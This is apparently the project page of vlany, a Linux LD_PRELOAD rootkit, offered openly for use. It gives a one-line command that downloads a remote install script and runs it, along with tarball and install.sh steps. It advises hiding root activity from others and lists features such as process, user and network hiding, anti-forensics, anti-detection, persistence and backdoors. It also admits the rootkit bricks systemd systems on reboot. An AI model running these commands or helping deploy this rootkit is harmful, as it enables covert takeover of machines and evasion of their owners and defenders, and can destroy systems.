Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)

vlany (wiki)

vlany is a Linux LD_PRELOAD rootkit.


  • vlany’s quick_install.sh script is the fastest/easiest method of installation.
    [email protected]:~# wget https://gist.githubusercontent.com/mempodippy/d93fd99164bace9e63752afb791a896b/raw/6b06d235beac8590f56c47b7f46e2e4fac9cf584/quick_install.sh -O /tmp/quick_install.sh && chmod +x /tmp/quick_install.sh && /tmp/quick_install.sh

    The quick_install.sh script automatically downloads the latest version of vlany from this repository, untars the archive, then executes the regular installation script from a new random directory in /tmp/. By default, the quick_install.sh script removes the new directory once execution has completely finished.

  • It’s very simple to install vlany onto a sytem as it comes with an automated install script.
    To install vlany you want to first download it from our GitHub ( Always up to date and trusted )
    [email protected]:~# wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar xvpfz master.tar.gz

  • Once it’s downloaded you just have to run install.sh inside vlany-master.
    [email protected]:~# cd vlany-master && ./install.sh
    By default this will prompt you with a tui installation but if cli is prefered you can use the –cli argument to invoke a similar cli installation.


Regular tui installation on a Debian 8 box using an suid binary to escalate privileges from a tmp user. In a real life scenario, you’ll want to play with some environment variables to prevent anyone from seeing your activity when root.




  • Process hiding
  • User hiding
  • Network hiding
  • LXC container
  • Anti-Debug
  • Anti-Forensics
  • Persistent (re)installation & Anti-Detection
  • Dynamic linker modifications
  • Backdoors
  • vlany-exclusive commands

Known bugs

Any bugs listed here will be present until a resolve has been reached. If a bug has been reported as an issue, the corresponding issue will also be linked in the bug listing. Should a bug be resolved, the listing will be removed from here, and if any issue is still open pertaining to the bug, it will be closed.

Serious bugs

  1. Vlany bricks systemd distributions on reboot so sysvinit distributions are safe.
  2. vlany fails to install correctly on anything above CentOS 6.6.

Minor bugs

  1. execve commands are still undergoing changes. I know they don’t work, but I’m considering using smaller, easier scripts instead of hard coding commands into vlany. (no longer considering, this is a wip)

In-depth README.txt (very detailed but not maintained)

NOTE: vlany is in active development. Changes are constantly being made to this repository, so beware that vlany is very experimental.

Related Repositories



Linux LD_PRELOAD rootkit (x86 and x86_64 architectures) ...